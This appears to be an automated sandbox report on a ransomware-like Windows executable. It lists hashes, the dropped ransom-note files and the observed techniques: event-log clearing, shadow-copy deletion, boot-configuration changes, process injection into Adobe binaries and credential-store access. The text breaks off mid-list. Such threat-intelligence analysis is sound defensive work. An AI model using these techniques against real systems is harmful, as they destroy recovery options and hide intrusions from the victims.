Overview
overview
10Static
static
100.46582298...58.exe
windows7-x64
700331dd25b...3a.exe
windows7-x64
10065988f36f...a0.exe
windows7-x64
30826716413...57.exe
windows7-x64
1008cf8ed94c...a4.exe
windows7-x64
100997ba7292...3c.exe
windows7-x64
30b7996bca4...5f.exe
windows7-x64
0c3431dbb8...ui.dll
windows7-x64
50cd7440ca9...bc.exe
windows7-x64
10100b8bfff5...ir.exe
windows7-x64
3101.ex_.exe
windows7-x64
3119.executable.exe
windows7-x64
6119.unp.exe
windows7-x64
611abb44de5...47.exe
windows7-x64
1011fb52c968...22.exe
windows7-x64
10123.exe
windows7-x64
1139.exe
windows7-x64
113E418BF18...73.dll
windows7-x64
3144.exe
windows7-x64
117697e1829...44.dll
windows7-x64
319561b3379...er.exe
windows7-x64
1019ec0d0e51...C5.exe
windows7-x64
71a6bed2aff...f2.exe
windows7-x64
101f210c60f9...40.exe
windows7-x64
101f3509cc11...dd.exe
windows7-x64
1020c6d29da8...7d.exe
windows7-x64
9234e77145d...2d.exe
windows7-x64
10263fc6fc9e...32.exe
windows7-x64
92e0da054d0...23.zip
windows7-x64
9Compenso.P...__.exe
windows7-x64
9301a3f5017...5f.exe
windows7-x64
1030620.ex_.exe
windows7-x64
10Analysis
-
max time kernel
147s -
max time network
125s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22-11-2024 02:14
Behavioral task
behavioral1
Sample
0.4658229854220858.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
00331dd25b83984d4b6d9753fec2b306e88ac87371ea48188df49cb630905d3a.exe
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
065988f36f3ab99ff40893c7ad756cfcc3baea1b8b5217f17cdd6e44160df0a0.exe
Resource
win7-20240729-en
Behavioral task
behavioral4
Sample
082671641341d89fe49d0da717846035ba6af02edb59840148eddc3586d21557.exe
Resource
win7-20240903-en
Behavioral task
behavioral5
Sample
08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
0997ba7292ddbac1c7e7ade6766ed53c.exe
Resource
win7-20240708-en
Behavioral task
behavioral7
Sample
0b7996bca486575be15e68dba7cbd802b1e5f90436ba23f802da66292c8a055f.exe
Resource
win7-20240708-en
Behavioral task
behavioral8
Sample
0c3431dbb8cd0478250eb4357257880e_localui.dll
Resource
win7-20241023-en
Behavioral task
behavioral9
Sample
0cd7440ca94d31212e21867439f38f0828823b76c94d566e81f5dfaf71574ebc.exe
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
100b8bfff550fb74c98a2ef9a71d4bb53553d2d7ba509bb451fe32814ec57e48.exe.vir.exe
Resource
win7-20240903-en
Behavioral task
behavioral11
Sample
101.ex_.exe
Resource
win7-20240729-en
Behavioral task
behavioral12
Sample
119.executable.exe
Resource
win7-20241010-en
Behavioral task
behavioral13
Sample
119.unp.exe
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
11abb44de53807e32980a010a473514694f901841e63ab33f5e0ff8754009b47.exe
Resource
win7-20240903-en
Behavioral task
behavioral15
Sample
11fb52c96853e12f011b7b7894e9884e56eb5522.exe
Resource
win7-20240903-en
Behavioral task
behavioral16
Sample
123.exe
Resource
win7-20240903-en
Behavioral task
behavioral17
Sample
139.exe
Resource
win7-20240903-en
Behavioral task
behavioral18
Sample
13E418BF18B03AC80580DB69ADA305A2B7093DFED00692DCF91A99D2526D3A73.dll
Resource
win7-20240903-en
Behavioral task
behavioral19
Sample
144.exe
Resource
win7-20241010-en
Behavioral task
behavioral20
Sample
17697e1829f0d18d2051a67bc2bca134_da3ded254909e9abaa46eb5bc3b10944.dll
Resource
win7-20240903-en
Behavioral task
behavioral21
Sample
19561b33793dcb865eae56575a899ce8_kovter_from_Sakura82_taskmanger.exe
Resource
win7-20240903-en
Behavioral task
behavioral22
Sample
19ec0d0e5143940492a1c79c06eb8f18aa9feb356e41b8b79fdc6a16a3bcd7bf_TDS=4F9B33C5.exe
Resource
win7-20241010-en
Behavioral task
behavioral23
Sample
1a6bed2afff1b9880e42a29cea9b8139bcb12e34085fb008de13aa983b82a4f2.exe
Resource
win7-20240903-en
Behavioral task
behavioral24
Sample
1f210c60f90fd8403099482455f3220b56b2864bc4d2b6af0abda4a2c3854d40.exe
Resource
win7-20240903-en
Behavioral task
behavioral25
Sample
1f3509cc11ffa1f7d839df93615cf1ba0819d75cafd5ef59110d9b01fb90addd.exe
Resource
win7-20240903-en
Behavioral task
behavioral26
Sample
20c6d29da875075afa0ed7b4fb58e555de89d4bed13bf5ad109817c593ddd77d.exe
Resource
win7-20241023-en
Behavioral task
behavioral27
Sample
234e77145d329956192c389249e20520851853e2a33779be93530788201b612d.exe
Resource
win7-20240729-en
Behavioral task
behavioral28
Sample
263fc6fc9efa4c05a08d9ff1fc7bb060a7b8f376f82afa17fd3fc267bc8e8032.exe
Resource
win7-20240903-en
Behavioral task
behavioral29
Sample
2e0da054d03fde4e7b2c2057cc4aa410c64b6ab8777ee6d4fd43f031a5170a23.zip
Resource
win7-20240708-en
Behavioral task
behavioral30
Sample
Compenso.Pdf______________________________________________________________.exe
Resource
win7-20240903-en
Behavioral task
behavioral31
Sample
301a3f5017e578fb04b0eb33f45831bb9bb8318020e0a18d222ebea08bf1c75f.exe
Resource
win7-20240903-en
Behavioral task
behavioral32
Sample
30620.ex_.exe
Resource
win7-20241010-en
General
-
Target
08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe
-
Size
727KB
-
MD5
d13f890034a68ccb4af4e0bf51e2b5ec
-
SHA1
84afde24c913c007b0c0490041b61877aa254737
-
SHA256
08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4
-
SHA512
0065844527f3a3556bc50705f9d5608561a04e95a2d99b1a262db1094ca188425ef69f02f801eab2eaf74e14e027ceebb471a754192e195e51b6c57d3d7d45ce
-
SSDEEP
12288:jk2624GHVUBOSRVrHZfiZHJ2HFO/9xwrPgWyzZp+L7vN3:H6+VUBraeF8/tSh
Malware Config
Extracted
C:\FILES.TXT
Signatures
-
Clears Windows event logs 1 TTPs 8 IoCs
pid Process 8668 wevtutil.exe 1396 wevtutil.exe 1148 wevtutil.exe 2052 wevtutil.exe 2388 wevtutil.exe 5596 wevtutil.exe 6616 wevtutil.exe 15584 wevtutil.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 3052 bcdedit.exe 3056 bcdedit.exe 4468 bcdedit.exe 4548 bcdedit.exe -
pid Process 1048 wbadmin.exe 4672 wbadmin.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\FILES.TXT A3DUtility.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\FILES.TXT AcroBroker.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\FILES.TXT AcroRd32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\FILES.TXT AdobeCollabSync.exe -
Executes dropped EXE 1 IoCs
pid Process 12708 AcroRd32Info.exe -
Loads dropped DLL 60 IoCs
pid Process 2884 AcroBroker.exe 2884 AcroBroker.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 2884 AcroBroker.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 15668 AcroRd32.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe 2092 AdobeCollabSync.exe -
Drops desktop.ini file(s) 48 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Links\desktop.ini A3DUtility.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI A3DUtility.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini A3DUtility.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Music\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Videos\desktop.ini A3DUtility.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-1488793075-819845221-1497111674-1000\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Documents\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini A3DUtility.exe File opened for modification C:\Program Files\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Libraries\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Videos\desktop.ini A3DUtility.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini A3DUtility.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\691RDNCS\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Downloads\desktop.ini A3DUtility.exe File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\CW1M20CU\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\I618Z2Y3\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Documents\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini AcroBroker.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini A3DUtility.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-1488793075-819845221-1497111674-1000\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Music\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini A3DUtility.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini A3DUtility.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini A3DUtility.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini A3DUtility.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini A3DUtility.exe File opened for modification C:\Program Files (x86)\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Pictures\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\C1JHBK4W\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini A3DUtility.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini A3DUtility.exe File opened for modification C:\Users\Public\Desktop\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Searches\desktop.ini A3DUtility.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini A3DUtility.exe -
Power Settings 1 TTPs 10 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 1200 powercfg.exe 8944 cmd.exe 8288 powercfg.exe 6016 powercfg.exe 1928 powercfg.exe 1896 powercfg.exe 6100 powercfg.exe 12948 powercfg.exe 2156 cmd.exe 1404 powercfg.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2860 set thread context of 2944 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 36 PID 2860 set thread context of 2884 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 54 PID 2860 set thread context of 15668 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 56 PID 2860 set thread context of 2092 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 58 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\System\it-IT AcroBroker.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hu A3DUtility.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue A3DUtility.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\STUBBY2.WMF A3DUtility.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme_0.9.300.v20140424-2042.jar A3DUtility.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR8F.GIF A3DUtility.exe File opened for modification C:\Program Files\Java\jre7\bin\JdbcOdbc.dll A3DUtility.exe File created C:\Program Files\VideoLAN\VLC\locale\ml\LC_MESSAGES\FILES.TXT AcroBroker.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-io-ui_zh_CN.jar A3DUtility.exe File created C:\Program Files (x86)\Common Files\Adobe\Updater6\FILES.TXT AcroRd32.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-14 A3DUtility.exe File opened for modification C:\Program Files\Common Files\System\msadc\msdfmap.dll AdobeCollabSync.exe File opened for modification C:\Program Files (x86)\Microsoft SQL Server Compact Edition\v3.5\sqlceme35.dll A3DUtility.exe File opened for modification C:\Program Files\Mozilla Firefox\firefox.exe.sig A3DUtility.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg AcroBroker.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\ja\UIAutomationClientsideProviders.resources.dll AcroRd32.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\System.IdentityModel.Selectors.dll AcroRd32.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.metadataprovider.exsd AcroBroker.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe File opened for modification C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe File created C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\es-ES\FILES.TXT A3DUtility.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGPUNCT.DPV A3DUtility.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099203.GIF A3DUtility.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\es\FILES.TXT AcroBroker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Angles.xml A3DUtility.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\IPMS.ICO A3DUtility.exe File opened for modification C:\Program Files\Common Files\System\msadc\en-US\msadcor.dll.mui AcroRd32.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\InputPersonalization.exe AdobeCollabSync.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Oslo A3DUtility.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105398.WMF A3DUtility.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\New_York A3DUtility.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ku_IQ\LC_MESSAGES AcroBroker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Microsoft.Office.BusinessData.dll AcroRd32.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AdobeLinguistic.dll AdobeCollabSync.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\TextConv\fr-FR 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe File created C:\Program Files\Java\FILES.TXT AcroBroker.exe File opened for modification C:\Program Files (x86)\Common Files\System\es-ES AcroBroker.exe File created C:\Program Files\Microsoft Games\More Games\es-ES\FILES.TXT AcroRd32.exe File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui AcroBroker.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\mainscroll.png A3DUtility.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\TabTip32.exe AdobeCollabSync.exe File opened for modification C:\Program Files\Common Files\System\msadc\msdaremr.dll AcroRd32.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE A3DUtility.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE A3DUtility.exe File opened for modification C:\Program Files\Java\jre7\bin\javaw.exe A3DUtility.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-output2.jar A3DUtility.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\TAB_ON.GIF A3DUtility.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OneNoteSyncPC.dll AcroRd32.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.JP.XML AcroBroker.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\System.Xml.Linq.dll AdobeCollabSync.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Help\en_US AcroRd32.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDFFile_8.ico AcroBroker.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303 AdobeCollabSync.exe File created C:\Program Files\Uninstall Information\FILES.TXT AdobeCollabSync.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt AcroBroker.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images A3DUtility.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\ja-JP AcroBroker.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ku_IQ\LC_MESSAGES AcroRd32.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Checkers\de-DE\ChkrRes.dll.mui AcroBroker.exe File opened for modification C:\Program Files\Java\jre7\lib\applet AdobeCollabSync.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd AdobeCollabSync.exe File opened for modification C:\Program Files\7-Zip\Lang\sw.txt A3DUtility.exe File created C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\FILES.TXT AcroBroker.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\FILES.TXT AcroBroker.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\FILES.TXT A3DUtility.exe File created C:\Windows\FILES.TXT AcroBroker.exe File created C:\Windows\FILES.TXT AcroRd32.exe File created C:\Windows\FILES.TXT AdobeCollabSync.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language A3DUtility.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AdobeCollabSync.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe -
Interacts with shadow copies 3 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2032 vssadmin.exe 9228 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2944 A3DUtility.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe 2860 08cf8ed94cc1ef6ae23133f3e506a50d8aad9047c6fa74568a0373d991261aa4.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeBackupPrivilege 1784 vssvc.exe Token: SeRestorePrivilege 1784 vssvc.exe Token: SeAuditPrivilege 1784 vssvc.exe Token: SeIncreaseQuotaPrivilege 2624 WMIC.exe Token: SeSecurityPrivilege 2624 WMIC.exe Token: SeTakeOwnershipPrivilege 2624 WMIC.exe Token: SeLoadDriverPrivilege 2624 WMIC.exe Token: SeSystemProfilePrivilege 2624 WMIC.exe Token: SeSystemtimePrivilege 2624 WMIC.exe Token: SeProfSingleProcessPrivilege 2624 WMIC.exe Token: SeIncBasePriorityPrivilege 2624 WMIC.exe Token: SeCreatePagefilePrivilege 2624 WMIC.exe Token: SeBackupPrivilege 2624 WMIC.exe Token: SeRestorePrivilege 2624 WMIC.exe Token: SeShutdownPrivilege 2624 WMIC.exe Token: SeDebugPrivilege 2624 WMIC.exe Token: SeSystemEnvironmentPrivilege 2624 WMIC.exe Token: SeRemoteShutdownPrivilege 2624 WMIC.exe Token: SeUndockPrivilege 2624 WMIC.exe Token: SeManageVolumePrivilege 2624 WMIC.exe Token: 33 2624 WMIC.exe Token: 34 2624 WMIC.exe Token: 35 2624 WMIC.exe Token: SeIncreaseQuotaPrivilege 2624 WMIC.exe Token: SeSecurityPrivilege 2624 WMIC.exe Token: SeTakeOwnershipPrivilege 2624 WMIC.exe Token: SeLoadDriverPrivilege 2624 WMIC.exe Token: SeSystemProfilePrivilege 2624 WMIC.exe Token: SeSystemtimePrivilege 2624 WMIC.exe Token: SeProfSingleProcessPrivilege 2624 WMIC.exe Token: SeIncBasePriorityPrivilege 2624 WMIC.exe Token: SeCreatePagefilePrivilege 2624 WMIC.exe Token: SeBackupPrivilege 2624 WMIC.exe Token: 